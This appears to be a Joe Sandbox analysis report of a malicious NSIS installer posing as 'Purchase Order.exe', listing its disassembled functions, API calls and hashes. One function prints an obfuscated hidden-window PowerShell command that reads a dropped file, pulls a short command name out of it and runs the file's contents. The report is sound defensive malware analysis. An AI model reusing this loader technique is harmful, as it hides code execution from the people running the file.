                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                          • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                          • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                          • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                          Function 00401D38 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D3B
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                          • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Calibri
                                                          • API String ID: 3808545654-1409258342
                                                          • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                          • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                          • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                          • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                          Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                          • GlobalFree.KERNEL32(?), ref: 0040276F
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                          • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                          • Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                          • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                          Function 00404709 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(Misguidingly Setup: Installing,Misguidingly Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                          • wsprintfA.USER32 ref: 004047AF
                                                          • SetDlgItemTextA.USER32(?,Misguidingly Setup: Installing), ref: 004047C2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$Misguidingly Setup: Installing
                                                          • API String ID: 3540041739-273555568
                                                          • Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                          • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                          • Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                          • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                          Function 00401F90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00402FFA,00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0), ref: 00404FA4
                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"), ref: 00404FB6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                          Strings
                                                          • "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", xrefs: 0040200F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID: "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
                                                          • API String ID: 2987980305-3891765529
                                                          • Opcode ID: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                          • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                          • Opcode Fuzzy Hash: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                          • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                          Function 00403974 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowTextA.USER32(00000000,Misguidingly Setup), ref: 00403A0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$1033$Misguidingly Setup$Misguidingly Setup: Installing
                                                          • API String ID: 530164218-4004346090
                                                          • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                          • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                          • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                          • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                          Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                          • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                          • Opcode Fuzzy Hash: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                          • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                          Function 004057A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                          • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-823278215
                                                          • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                          • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                          • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                          • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                          Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                          • GetTickCount.KERNEL32 ref: 00402C33
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                          • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                          • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                          • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                          Function 0040588F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Misguidingly Setup,NSIS Error), ref: 00405D3C
                                                            • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                          • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                          • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3248276644-823278215
                                                          • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                          • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                          • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                          • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                          Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404EEB
                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                            • Part of subcall function 00403F60: SendMessageA.USER32(00010446,00000000,00000000,00000000), ref: 00403F72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                          • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                          • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                          • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                          Function 0040361A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,75923410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
